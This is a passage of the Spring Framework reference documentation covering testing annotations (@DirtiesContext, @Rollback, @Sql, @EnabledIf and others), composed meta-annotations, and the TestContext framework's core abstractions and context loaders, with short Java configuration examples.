When an\napplication context is marked __dirty__, it is removed from the testing framework's cache\nand closed. As a consequence, the underlying Spring container will be rebuilt for any\nsubsequent test that requires a context with the same configuration metadata.\n\n`@DirtiesContext` can be used as both a class-level and method-level annotation within\nthe same class or class hierarchy. 
In such scenarios, the `ApplicationContext` is marked\nas __dirty__ before or after any such annotated method as well as before or after the\ncurrent test class, depending on the configured `methodMode` and `classMode`.\n\nThe following examples explain when the context would be dirtied for various\nconfiguration scenarios:\n\n* Before the current test class, when declared on a class with class mode set to\n`BEFORE_CLASS`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(classMode = BEFORE_CLASS)**\n\tpublic class FreshContextTests {\n\t\t\/\/ some tests that require a new Spring container\n\t}\n----\n\n+\n\n* After the current test class, when declared on a class with class mode set to\n`AFTER_CLASS` (i.e., the default class mode).\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext**\n\tpublic class ContextDirtyingTests {\n\t\t\/\/ some tests that result in the Spring container being dirtied\n\t}\n----\n\n+\n\n* Before each test method in the current test class, when declared on a class with class\nmode set to `BEFORE_EACH_TEST_METHOD.`\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(classMode = BEFORE_EACH_TEST_METHOD)**\n\tpublic class FreshContextTests {\n\t\t\/\/ some tests that require a new Spring container\n\t}\n----\n\n+\n\n* After each test method in the current test class, when declared on a class with class\nmode set to `AFTER_EACH_TEST_METHOD.`\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(classMode = AFTER_EACH_TEST_METHOD)**\n\tpublic class ContextDirtyingTests {\n\t\t\/\/ some tests that result in the Spring container being dirtied\n\t}\n----\n\n+\n\n* Before the current test, when declared on a method with the method mode set to\n`BEFORE_METHOD`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(methodMode = BEFORE_METHOD)**\n\t@Test\n\tpublic void testProcessWhichRequiresFreshAppCtx() {\n\t\t\/\/ some logic that requires a new Spring container\n\t}\n----\n\n+\n\n* After the current test, when declared on a method with the method mode set to\n`AFTER_METHOD` (i.e., the default method mode).\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext**\n\t@Test\n\tpublic void testProcessWhichDirtiesAppCtx() {\n\t\t\/\/ some logic that results in the Spring container being dirtied\n\t}\n----\n\nIf `@DirtiesContext` is used in a test whose context is configured as part of a context\nhierarchy via `@ContextHierarchy`, the `hierarchyMode` flag can be used to control how\nthe context cache is cleared. By default an __exhaustive__ algorithm will be used that\nclears the context cache including not only the current level but also all other context\nhierarchies that share an ancestor context common to the current test; all\n``ApplicationContext``s that reside in a sub-hierarchy of the common ancestor context\nwill be removed from the context cache and closed. 
If the __exhaustive__ algorithm is\noverkill for a particular use case, the simpler __current level__ algorithm can be\nspecified instead, as seen below.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(\"\/parent-config.xml\"),\n\t\t@ContextConfiguration(\"\/child-config.xml\")\n\t})\n\tpublic class BaseTests {\n\t\t\/\/ class body...\n\t}\n\n\tpublic class ExtendedTests extends BaseTests {\n\n\t\t@Test\n\t\t@DirtiesContext(**hierarchyMode = CURRENT_LEVEL**)\n\t\tpublic void test() {\n\t\t\t\/\/ some logic that results in the child context being dirtied\n\t\t}\n\t}\n----\n\nFor further details regarding the `EXHAUSTIVE` and `CURRENT_LEVEL` algorithms see the\n`DirtiesContext.HierarchyMode` javadocs.\n\n===== @TestExecutionListeners\n`@TestExecutionListeners` defines class-level metadata for configuring the\n`TestExecutionListener` implementations that should be registered with the\n`TestContextManager`. Typically, `@TestExecutionListeners` is used in conjunction with\n`@ContextConfiguration`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@TestExecutionListeners**({CustomTestExecutionListener.class, AnotherTestExecutionListener.class})\n\tpublic class CustomTestExecutionListenerTests {\n\t\t\/\/ class body...\n\t}\n----\n\n`@TestExecutionListeners` supports _inherited_ listeners by default. See the javadocs\nfor an example and further details.\n\n===== @Commit\n`@Commit` indicates that the transaction for a transactional test method should be\n__committed__ after the test method has completed. `@Commit` can be used as a direct\nreplacement for `@Rollback(false)` in order to more explicitly convey the intent of the\ncode. Analogous to `@Rollback`, `@Commit` may also be declared as a class-level or\nmethod-level annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Commit**\n\t@Test\n\tpublic void testProcessWithoutRollback() {\n\t\t\/\/ ...\n\t}\n----\n\n===== @Rollback\n`@Rollback` indicates whether the transaction for a transactional test method should be\n__rolled back__ after the test method has completed. If `true`, the transaction is rolled\nback; otherwise, the transaction is committed (see also `@Commit`). Rollback semantics\nfor integration tests in the Spring TestContext Framework default to `true` even if\n`@Rollback` is not explicitly declared.\n\nWhen declared as a class-level annotation, `@Rollback` defines the default rollback\nsemantics for all test methods within the test class hierarchy. When declared as a\nmethod-level annotation, `@Rollback` defines rollback semantics for the specific test\nmethod, potentially overriding class-level `@Rollback` or `@Commit` semantics.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Rollback**(false)\n\t@Test\n\tpublic void testProcessWithoutRollback() {\n\t\t\/\/ ...\n\t}\n----\n\n===== @BeforeTransaction\n`@BeforeTransaction` indicates that the annotated `void` method should be executed\n__before__ a transaction is started for test methods configured to run within a\ntransaction via Spring's `@Transactional` annotation. 
As of Spring Framework 4.3,\n`@BeforeTransaction` methods are not required to be `public` and may be declared on Java\n8 based interface default methods.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@BeforeTransaction**\n\tvoid beforeTransaction() {\n\t\t\/\/ logic to be executed before a transaction is started\n\t}\n----\n\n===== @AfterTransaction\n`@AfterTransaction` indicates that the annotated `void` method should be executed\n__after__ a transaction is ended for test methods configured to run within a transaction\nvia Spring's `@Transactional` annotation. As of Spring Framework 4.3, `@AfterTransaction`\nmethods are not required to be `public` and may be declared on Java 8 based interface\ndefault methods.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@AfterTransaction**\n\tvoid afterTransaction() {\n\t\t\/\/ logic to be executed after a transaction has ended\n\t}\n----\n\n===== @Sql\n`@Sql` is used to annotate a test class or test method to configure SQL scripts to be\nexecuted against a given database during integration tests.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t**@Sql**({\"\/test-schema.sql\", \"\/test-user-data.sql\"})\n\tpublic void userTest() {\n\t\t\/\/ execute code that relies on the test schema and test data\n\t}\n----\n\nSee <<testcontext-executing-sql-declaratively>> for further details.\n\n===== @SqlConfig\n`@SqlConfig` defines metadata that is used to determine how to parse and execute SQL\nscripts configured via the `@Sql` annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t@Sql(\n\t\tscripts = \"\/test-user-data.sql\",\n\t\tconfig = **@SqlConfig**(commentPrefix = \"`\", separator = \"@@\")\n\t)\n\tpublic void userTest() {\n\t\t\/\/ execute code that relies on the test data\n\t}\n----\n\n===== @SqlGroup\n`@SqlGroup` is a container annotation that aggregates several `@Sql` annotations.\n`@SqlGroup` can be used natively, declaring several nested `@Sql` annotations, or it can\nbe used in conjunction with Java 8's support for repeatable annotations, where `@Sql` can\nsimply be declared several times on the same class or method, implicitly generating this\ncontainer annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t**@SqlGroup**({\n\t\t@Sql(scripts = \"\/test-schema.sql\", config = @SqlConfig(commentPrefix = \"`\")),\n\t\t@Sql(\"\/test-user-data.sql\")\n\t})\n\tpublic void userTest() {\n\t\t\/\/ execute code that uses the test schema and test data\n\t}\n----\n\n\n[[integration-testing-annotations-standard]]\n==== Standard Annotation Support\nThe following annotations are supported with standard semantics for all configurations\nof the Spring TestContext Framework. 
Note that these annotations are not specific to\ntests and can be used anywhere in the Spring Framework.\n\n* `@Autowired`\n* `@Qualifier`\n* `@Resource` (javax.annotation) _if JSR-250 is present_\n* `@ManagedBean` (javax.annotation) _if JSR-250 is present_\n* `@Inject` (javax.inject) _if JSR-330 is present_\n* `@Named` (javax.inject) _if JSR-330 is present_\n* `@PersistenceContext` (javax.persistence) _if JPA is present_\n* `@PersistenceUnit` (javax.persistence) _if JPA is present_\n* `@Required`\n* `@Transactional`\n\n.JSR-250 Lifecycle Annotations\n[NOTE]\n====\nIn the Spring TestContext Framework `@PostConstruct` and `@PreDestroy` may be used with\nstandard semantics on any application components configured in the `ApplicationContext`;\nhowever, these lifecycle annotations have limited usage within an actual test class.\n\nIf a method within a test class is annotated with `@PostConstruct`, that method will be\nexecuted before any __before__ methods of the underlying test framework (e.g., methods\nannotated with JUnit Jupiter's `@BeforeEach`), and that will apply for every test method\nin the test class. On the other hand, if a method within a test class is annotated with\n`@PreDestroy`, that method will __never__ be executed. Within a test class it is\ntherefore recommended to use test lifecycle callbacks from the underlying test framework\ninstead of `@PostConstruct` and `@PreDestroy`.\n====\n\n\n[[integration-testing-annotations-junit4]]\n==== Spring JUnit 4 Testing Annotations\n\nThe following annotations are __only__ supported when used in conjunction with the\n<<testcontext-junit4-runner,SpringRunner>>, <<testcontext-junit4-rules,Spring's JUnit\n4 rules>>, or <<testcontext-support-classes-junit4,Spring's JUnit 4 support classes>>.\n\n===== @IfProfileValue\n`@IfProfileValue` indicates that the annotated test is enabled for a specific testing\nenvironment. If the configured `ProfileValueSource` returns a matching `value` for the\nprovided `name`, the test is enabled. Otherwise, the test will be disabled and\neffectively _ignored_.\n\n`@IfProfileValue` can be applied at the class level, the method level, or both.\nClass-level usage of `@IfProfileValue` takes precedence over method-level usage for any\nmethods within that class or its subclasses. Specifically, a test is enabled if it is\nenabled both at the class level _and_ at the method level; the absence of\n`@IfProfileValue` means the test is implicitly enabled. 
This is analogous to the\nsemantics of JUnit 4's `@Ignore` annotation, except that the presence of `@Ignore` always\ndisables a test.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@IfProfileValue**(**name**=\"java.vendor\", **value**=\"Oracle Corporation\")\n\t@Test\n\tpublic void testProcessWhichRunsOnlyOnOracleJvm() {\n\t\t\/\/ some logic that should run only on Java VMs from Oracle Corporation\n\t}\n----\n\nAlternatively, you can configure `@IfProfileValue` with a list of `values` (with __OR__\nsemantics) to achieve TestNG-like support for __test groups__ in a JUnit 4 environment.\nConsider the following example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@IfProfileValue**(**name**=\"test-groups\", **values**={\"unit-tests\", \"integration-tests\"})\n\t@Test\n\tpublic void testProcessWhichRunsForUnitOrIntegrationTestGroups() {\n\t\t\/\/ some logic that should run only for unit and integration test groups\n\t}\n----\n\n===== @ProfileValueSourceConfiguration\n`@ProfileValueSourceConfiguration` is a class-level annotation that specifies what type\nof `ProfileValueSource` to use when retrieving __profile values__ configured through the\n`@IfProfileValue` annotation. If `@ProfileValueSourceConfiguration` is not declared for a\ntest, `SystemProfileValueSource` is used by default.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ProfileValueSourceConfiguration**(CustomProfileValueSource.class)\n\tpublic class CustomProfileValueSourceTests {\n\t\t\/\/ class body...\n\t}\n----\n\n===== @Timed\n`@Timed` indicates that the annotated test method must finish execution in a specified\ntime period (in milliseconds). If the test execution time exceeds the specified time\nperiod, the test fails.\n\nThe time period includes execution of the test method itself, any repetitions of the\ntest (see `@Repeat`), as well as any __set up__ or __tear down__ of the test fixture.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Timed**(millis=1000)\n\tpublic void testProcessWithOneSecondTimeout() {\n\t\t\/\/ some logic that should not take longer than 1 second to execute\n\t}\n----\n\nSpring's `@Timed` annotation has different semantics than JUnit 4's `@Test(timeout=...)`\nsupport. Specifically, due to the manner in which JUnit 4 handles test execution timeouts\n(that is, by executing the test method in a separate `Thread`), `@Test(timeout=...)`\npreemptively fails the test if the test takes too long. Spring's `@Timed`, on the other\nhand, does not preemptively fail the test but rather waits for the test to complete\nbefore failing.\n\n===== @Repeat\n`@Repeat` indicates that the annotated test method must be executed repeatedly. 
The\nnumber of times that the test method is to be executed is specified in the annotation.\n\nThe scope of execution to be repeated includes execution of the test method itself as\nwell as any __set up__ or __tear down__ of the test fixture.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Repeat**(10)\n\t@Test\n\tpublic void testProcessRepeatedly() {\n\t\t\/\/ ...\n\t}\n----\n\n[[integration-testing-annotations-junit-jupiter]]\n==== Spring JUnit Jupiter Testing Annotations\n\nThe following annotations are __only__ supported when used in conjunction with the\n<<testcontext-junit-jupiter-extension,`SpringExtension`>> and JUnit Jupiter (i.e., the\nprogramming model in JUnit 5).\n\n===== @SpringJUnitConfig\n\n`@SpringJUnitConfig` is a _composed annotation_ that combines\n`@ExtendWith(SpringExtension.class)` from JUnit Jupiter with `@ContextConfiguration` from\nthe Spring TestContext Framework. It can be used at the class level as a drop-in\nreplacement for `@ContextConfiguration`. With regard to configuration options, the only\ndifference between `@ContextConfiguration` and `@SpringJUnitConfig` is that annotated\nclasses may be declared via the `value` attribute in `@SpringJUnitConfig`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@SpringJUnitConfig**(TestConfig.class)\n\tclass ConfigurationClassJUnitJupiterSpringTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@SpringJUnitConfig**(**locations** = \"\/test-config.xml\")\n\tclass XmlJUnitJupiterSpringTests {\n\t\t\/\/ class body...\n\t}\n----\n\nSee <<testcontext-ctx-management>> as well as the javadocs for `@SpringJUnitConfig` and\n`@ContextConfiguration` for further details.\n\n===== @SpringJUnitWebConfig\n\n`@SpringJUnitWebConfig` is a _composed annotation_ that combines\n`@ExtendWith(SpringExtension.class)` from JUnit Jupiter with `@ContextConfiguration` and\n`@WebAppConfiguration` from the Spring TestContext Framework. It can be used at the class\nlevel as a drop-in replacement for `@ContextConfiguration` and `@WebAppConfiguration`.\nWith regard to configuration options, the only difference between `@ContextConfiguration`\nand `@SpringJUnitWebConfig` is that annotated classes may be declared via the `value`\nattribute in `@SpringJUnitWebConfig`. In addition, the `value` attribute from\n`@WebAppConfiguration` can only be overridden via the `resourcePath` attribute in\n`@SpringJUnitWebConfig`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@SpringJUnitWebConfig**(TestConfig.class)\n\tclass ConfigurationClassJUnitJupiterSpringWebTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@SpringJUnitWebConfig**(**locations** = \"\/test-config.xml\")\n\tclass XmlJUnitJupiterSpringWebTests {\n\t\t\/\/ class body...\n\t}\n----\n\nSee <<testcontext-ctx-management>> as well as the javadocs for `@SpringJUnitWebConfig`,\n`@ContextConfiguration`, and `@WebAppConfiguration` for further details.\n\n===== @EnabledIf\n\n`@EnabledIf` is used to signal that the annotated JUnit Jupiter test class or test method\nis _enabled_ and should be executed if the supplied `expression` evaluates to `true`.\nSpecifically, if the expression evaluates to `Boolean.TRUE` or a `String` equal to\n`\"true\"` (ignoring case), the test will be __enabled__. 
When applied at the class level,\nall test methods within that class are automatically enabled by default as well.\n\nExpressions can be any of the following.\n\n* <<core.adoc#expressions,Spring Expression Language>> (SpEL) expression \u2013 for example:\n - `@EnabledIf(\"#{systemProperties['os.name'].toLowerCase().contains('mac')}\")`\n* Placeholder for a property available in the Spring\n <<core.adoc#beans-environment,`Environment`>> \u2013 for example:\n - `@EnabledIf(\"${smoke.tests.enabled}\")`\n* Text literal \u2013 for example:\n - `@EnabledIf(\"true\")`\n\nNote, however, that a text literal which is _not_ the result of dynamic resolution of a\nproperty placeholder is of zero practical value since `@EnabledIf(\"false\")` is equivalent\nto `@Disabled` and `@EnabledIf(\"true\")` is logically meaningless.\n\n`@EnabledIf` may be used as a meta-annotation to create custom composed annotations. For\nexample, a custom `@EnabledOnMac` annotation can be created as follows.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@Target({ ElementType.TYPE, ElementType.METHOD })\n@Retention(RetentionPolicy.RUNTIME)\n@EnabledIf(\n expression = \"#{systemProperties['os.name'].toLowerCase().contains('mac')}\",\n reason = \"Enabled on Mac OS\"\n)\npublic @interface EnabledOnMac {}\n----\n\n===== @DisabledIf\n\n`@DisabledIf` is used to signal that the annotated JUnit Jupiter test class or test\nmethod is _disabled_ and should not be executed if the supplied `expression` evaluates to\n`true`. Specifically, if the expression evaluates to `Boolean.TRUE` or a `String` equal\nto `\"true\"` (ignoring case), the test will be __disabled__. When applied at the class\nlevel, all test methods within that class are automatically disabled as well.\n\nExpressions can be any of the following.\n\n* <<core.adoc#expressions,Spring Expression Language>> (SpEL) expression \u2013 for example:\n - `@DisabledIf(\"#{systemProperties['os.name'].toLowerCase().contains('mac')}\")`\n* Placeholder for a property available in the Spring\n <<core.adoc#beans-environment,`Environment`>> \u2013 for example:\n - `@DisabledIf(\"${smoke.tests.disabled}\")`\n* Text literal \u2013 for example:\n - `@DisabledIf(\"true\")`\n\nNote, however, that a text literal which is _not_ the result of dynamic resolution of a\nproperty placeholder is of zero practical value since `@DisabledIf(\"true\")` is\nequivalent to `@Disabled` and `@DisabledIf(\"false\")` is logically meaningless.\n\n`@DisabledIf` may be used as a meta-annotation to create custom composed annotations. 
For\nexample, a custom `@DisabledOnMac` annotation can be created as follows.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@Target({ ElementType.TYPE, ElementType.METHOD })\n@Retention(RetentionPolicy.RUNTIME)\n@DisabledIf(\n expression = \"#{systemProperties['os.name'].toLowerCase().contains('mac')}\",\n reason = \"Disabled on Mac OS\"\n)\npublic @interface DisabledOnMac {}\n----\n\n\n[[integration-testing-annotations-meta]]\n==== Meta-Annotation Support for Testing\nIt is possible to use most test-related annotations as\n<<core.adoc#beans-meta-annotations,meta-annotations>> in order to create custom _composed\nannotations_ and reduce configuration duplication across a test suite.\n\nEach of the following may be used as meta-annotations in conjunction with the\n<<testcontext-framework,TestContext framework>>.\n\n* `@BootstrapWith`\n* `@ContextConfiguration`\n* `@ContextHierarchy`\n* `@ActiveProfiles`\n* `@TestPropertySource`\n* `@DirtiesContext`\n* `@WebAppConfiguration`\n* `@TestExecutionListeners`\n* `@Transactional`\n* `@BeforeTransaction`\n* `@AfterTransaction`\n* `@Commit`\n* `@Rollback`\n* `@Sql`\n* `@SqlConfig`\n* `@SqlGroup`\n* `@Repeat` _(only supported on JUnit 4)_\n* `@Timed` _(only supported on JUnit 4)_\n* `@IfProfileValue` _(only supported on JUnit 4)_\n* `@ProfileValueSourceConfiguration` _(only supported on JUnit 4)_\n* `@SpringJUnitConfig` _(only supported on JUnit Jupiter)_\n* `@SpringJUnitWebConfig` _(only supported on JUnit Jupiter)_\n* `@EnabledIf` _(only supported on JUnit Jupiter)_\n* `@DisabledIf` _(only supported on JUnit Jupiter)_\n\nFor example, if we discover that we are repeating the following configuration across our\n_JUnit 4_ based test suite...\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic class OrderRepositoryTests { }\n\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic class UserRepositoryTests { }\n----\n\nWe can reduce the above duplication by introducing a custom _composed annotation_ that\ncentralizes the common test configuration for Spring like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target(ElementType.TYPE)\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic @interface TransactionalDevTestConfig { }\n----\n\nThen we can use our custom `@TransactionalDevTestConfig` annotation to simplify the\nconfiguration of individual JUnit 4 based test classes as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@TransactionalDevTestConfig\n\tpublic class OrderRepositoryTests { }\n\n\t@RunWith(SpringRunner.class)\n\t@TransactionalDevTestConfig\n\tpublic class UserRepositoryTests { }\n----\n\nIf we are writing tests using JUnit Jupiter, we can reduce code duplication even further\nsince annotations in JUnit 5 can also be used as meta-annotations. 
For example, if we
discover that we are repeating the following configuration across our JUnit Jupiter based
test suite...

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@ExtendWith(SpringExtension.class)
	@ContextConfiguration({"/app-config.xml", "/test-data-access-config.xml"})
	@ActiveProfiles("dev")
	@Transactional
	class OrderRepositoryTests { }

	@ExtendWith(SpringExtension.class)
	@ContextConfiguration({"/app-config.xml", "/test-data-access-config.xml"})
	@ActiveProfiles("dev")
	@Transactional
	class UserRepositoryTests { }
----

We can reduce the above duplication by introducing a custom _composed annotation_
that centralizes the common test configuration for Spring and JUnit Jupiter like this:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Target(ElementType.TYPE)
	@Retention(RetentionPolicy.RUNTIME)
	@ExtendWith(SpringExtension.class)
	@ContextConfiguration({"/app-config.xml", "/test-data-access-config.xml"})
	@ActiveProfiles("dev")
	@Transactional
	public @interface TransactionalDevTestConfig { }
----

Then we can use our custom `@TransactionalDevTestConfig` annotation to simplify the
configuration of individual JUnit Jupiter based test classes as follows:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@TransactionalDevTestConfig
	class OrderRepositoryTests { }

	@TransactionalDevTestConfig
	class UserRepositoryTests { }
----

Since JUnit Jupiter supports the use of `@Test`, `@RepeatedTest`, `@ParameterizedTest`,
etc. as meta-annotations, it is also possible to create custom composed annotations at
the test method level. For example, if we wish to create a _composed annotation_ that
combines the `@Test` and `@Tag` annotations from JUnit Jupiter with the `@Transactional`
annotation from Spring, we could create an `@TransactionalIntegrationTest` annotation as
follows.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Target(ElementType.METHOD)
	@Retention(RetentionPolicy.RUNTIME)
	@Transactional
	@Tag("integration-test") // org.junit.jupiter.api.Tag
	@Test // org.junit.jupiter.api.Test
	public @interface TransactionalIntegrationTest { }
----

Then we can use our custom `@TransactionalIntegrationTest` annotation to simplify the
configuration of individual JUnit Jupiter based test methods as follows:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@TransactionalIntegrationTest
	void saveOrder() { }

	@TransactionalIntegrationTest
	void deleteOrder() { }
----

For further details, consult the <<core.adoc#annotation-programming-model,Spring
Annotation Programming Model>>.


[[testcontext-framework]]
=== Spring TestContext Framework
The __Spring TestContext Framework__ (located in the
`org.springframework.test.context` package) provides generic, annotation-driven unit and
integration testing support that is agnostic of the testing framework in use. The
TestContext framework also places a great deal of importance on __convention over
configuration__ with reasonable defaults that can be overridden through annotation-based
configuration.

In addition to generic testing infrastructure, the TestContext framework provides
explicit support for JUnit 4, JUnit Jupiter (a.k.a., JUnit 5), and TestNG. For JUnit 4
and TestNG, Spring provides `abstract` support classes.
Furthermore, Spring provides a\ncustom JUnit `Runner` and custom JUnit `Rules` for _JUnit 4_ as well as a custom\n`Extension` for _JUnit Jupiter_ that allow one to write so-called __POJO test classes__.\nPOJO test classes are not required to extend a particular class hierarchy such as the\n`abstract` support classes.\n\nThe following section provides an overview of the internals of the TestContext framework.\nIf you are only interested in _using_ the framework and not necessarily interested in\n_extending_ it with your own custom listeners or custom loaders, feel free to go directly\nto the configuration (<<testcontext-ctx-management,context management>>,\n<<testcontext-fixture-di,dependency injection>>, <<testcontext-tx,transaction\nmanagement>>), <<testcontext-support-classes,support classes>>, and\n<<integration-testing-annotations,annotation support>> sections.\n\n\n[[testcontext-key-abstractions]]\n==== Key abstractions\nThe core of the framework consists of the `TestContextManager` class and the\n`TestContext`, `TestExecutionListener`, and `SmartContextLoader` interfaces. A\n`TestContextManager` is created per test class (e.g., for the execution of all test\nmethods within a single test class in JUnit Jupiter). The `TestContextManager` in turn\nmanages a `TestContext` that holds the context of the current test. The\n`TestContextManager` also updates the state of the `TestContext` as the test progresses\nand delegates to `TestExecutionListener` implementations, which instrument the actual\ntest execution by providing dependency injection, managing transactions, and so on. A\n`SmartContextLoader` is responsible for loading an `ApplicationContext` for a given test\nclass. Consult the javadocs and the Spring test suite for further information and\nexamples of various implementations.\n\n===== TestContext\n`TestContext` encapsulates the context in which a test is executed, agnostic of the\nactual testing framework in use, and provides context management and caching support for\nthe test instance for which it is responsible. The `TestContext` also delegates to a\n`SmartContextLoader` to load an `ApplicationContext` if requested.\n\n===== TestContextManager\n`TestContextManager` is the main entry point into the __Spring TestContext Framework__\nand is responsible for managing a single `TestContext` and signaling events to each\nregistered `TestExecutionListener` at well-defined test execution points:\n\n* prior to any __before class__ or __before all__ methods of a particular testing framework\n* test instance post-processing\n* prior to any __before__ or __before each__ methods of a particular testing framework\n* immediately before execution of the test method but after test setup\n* immediately after execution of the test method but before test tear down\n* after any __after__ or __after each__ methods of a particular testing framework\n* after any __after class__ or __after all__ methods of a particular testing framework\n\n===== TestExecutionListener\n`TestExecutionListener` defines the API for reacting to test execution events published\nby the `TestContextManager` with which the listener is registered. 
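For illustration, the following is a minimal sketch of a custom listener; the class name
and the logging it performs are hypothetical, not part of the framework. It extends
Spring's `AbstractTestExecutionListener` rather than implementing the interface directly,
so it only needs to override the callbacks it actually cares about.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	import org.springframework.test.context.TestContext;
	import org.springframework.test.context.support.AbstractTestExecutionListener;

	// Hypothetical listener that traces the execution of each test method
	public class LoggingTestExecutionListener extends AbstractTestExecutionListener {

		@Override
		public void beforeTestMethod(TestContext testContext) {
			System.out.println("Starting: " + testContext.getTestMethod().getName());
		}

		@Override
		public void afterTestMethod(TestContext testContext) {
			System.out.println("Finished: " + testContext.getTestMethod().getName());
		}
	}
----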
See\n<<testcontext-tel-config>>.\n\n===== Context Loaders\n`ContextLoader` is a strategy interface that was introduced in Spring 2.5 for loading an\n`ApplicationContext` for an integration test managed by the Spring TestContext Framework.\nImplement `SmartContextLoader` instead of this interface in order to provide support for\nannotated classes, active bean definition profiles, test property sources, context\nhierarchies, and `WebApplicationContext` support.\n\n`SmartContextLoader` is an extension of the `ContextLoader` interface introduced in\nSpring 3.1. The `SmartContextLoader` SPI supersedes the `ContextLoader` SPI that was\nintroduced in Spring 2.5. Specifically, a `SmartContextLoader` can choose to process\nresource `locations`, annotated `classes`, or context `initializers`. Furthermore, a\n`SmartContextLoader` can set active bean definition profiles and test property sources in\nthe context that it loads.\n\nSpring provides the following implementations:\n\n* `DelegatingSmartContextLoader`: one of two default loaders which delegates internally\nto an `AnnotationConfigContextLoader`, a `GenericXmlContextLoader`, or a\n`GenericGroovyXmlContextLoader` depending either on the configuration declared for the\ntest class or on the presence of default locations or default configuration classes.\nGroovy support is only enabled if Groovy is on the classpath.\n* `WebDelegatingSmartContextLoader`: one of two default loaders which delegates\ninternally to an `AnnotationConfigWebContextLoader`, a `GenericXmlWebContextLoader`, or a\n`GenericGroovyXmlWebContextLoader` depending either on the configuration declared for the\ntest class or on the presence of default locations or default configuration classes. A\nweb `ContextLoader` will only be used if `@WebAppConfiguration` is present on the test\nclass. Groovy support is only enabled if Groovy is on the classpath.\n* `AnnotationConfigContextLoader`: loads a standard `ApplicationContext` from\n__annotated classes__.\n* `AnnotationConfigWebContextLoader`: loads a `WebApplicationContext` from __annotated\nclasses__.\n* `GenericGroovyXmlContextLoader`: loads a standard `ApplicationContext` from __resource\nlocations__ that are either Groovy scripts or XML configuration files.\n* `GenericGroovyXmlWebContextLoader`: loads a `WebApplicationContext` from __resource\nlocations__ that are either Groovy scripts or XML configuration files.\n* `GenericXmlContextLoader`: loads a standard `ApplicationContext` from XML __resource\nlocations__.\n* `GenericXmlWebContextLoader`: loads a `WebApplicationContext` from XML __resource\nlocations__.\n* `GenericPropertiesContextLoader`: loads a standard `ApplicationContext` from Java\nProperties files.\n\n[[testcontext-bootstrapping]]\n==== Bootstrapping the TestContext framework\n\nThe default configuration for the internals of the Spring TestContext Framework is\nsufficient for all common use cases. However, there are times when a development team or\nthird party framework would like to change the default `ContextLoader`, implement a\ncustom `TestContext` or `ContextCache`, augment the default sets of\n`ContextCustomizerFactory` and `TestExecutionListener` implementations, etc. 
